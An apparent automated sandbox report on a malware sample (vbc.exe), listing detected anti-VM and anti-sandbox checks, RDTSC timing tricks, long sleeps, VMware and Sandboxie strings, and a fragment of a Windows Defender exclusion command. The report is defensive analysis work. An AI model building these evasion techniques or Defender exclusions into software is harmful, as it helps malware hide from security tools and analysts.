          Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: 0.2.vbc.exe.2aec108.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 6420, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\vbc.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\vbc.exeRDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 0000000002B48604 second address: 0000000002B4860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 0000000002B4899E second address: 0000000002B489A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\vbc.exe TID: 6424Thread sleep time: -38500s >= -30000s
          Source: C:\Users\user\Desktop\vbc.exe TID: 6464Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6808Thread sleep time: -7378697629483816s >= -30000s
          Source: C:\Windows\SysWOW64\help.exe TID: 6612Thread sleep time: -40000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_004088D0 rdtsc
          Source: C:\Users\user\Desktop\vbc.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5311
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3100
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\vbc.exeThread delayed: delay time: 38500
          Source: C:\Users\user\Desktop\vbc.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 0000000B.00000000.276178140.0000000008A32000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 0000000B.00000000.276178140.0000000008A32000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000B.00000000.310303787.0000000008B4E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 0000000B.00000000.277498776.0000000008CEA000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}froQQ
          Source: explorer.exe, 0000000B.00000000.310303787.0000000008B4E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: explorer.exe, 0000000B.00000000.303948954.00000000048E0000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000B.00000000.311106816.0000000008C73000.00000004.00000001.sdmpBinary or memory string: _VMware_SATA_CD00#5&
          Source: explorer.exe, 0000000B.00000000.310145026.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
          Source: explorer.exe, 0000000B.00000000.310303787.0000000008B4E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
          Source: explorer.exe, 0000000B.00000000.310145026.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 0000000B.00000000.292121937.00000000069DA000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD002
          Source: explorer.exe, 0000000B.00000000.280486172.000000000ECF7000.00000004.00000001.sdmpBinary or memory string: 00000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}LL
          Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_004088D0 rdtsc
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\vbc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\help.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0181C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0182A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017FB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017FB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0182FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0182FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018235A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017FAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018A8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01814120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01814120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01814120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01814120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01814120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018C8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0182513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0182513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01824D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01824D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01824D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01833D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0181B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0181B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01873540 mov eax, dword ptr fs:[00000030h]
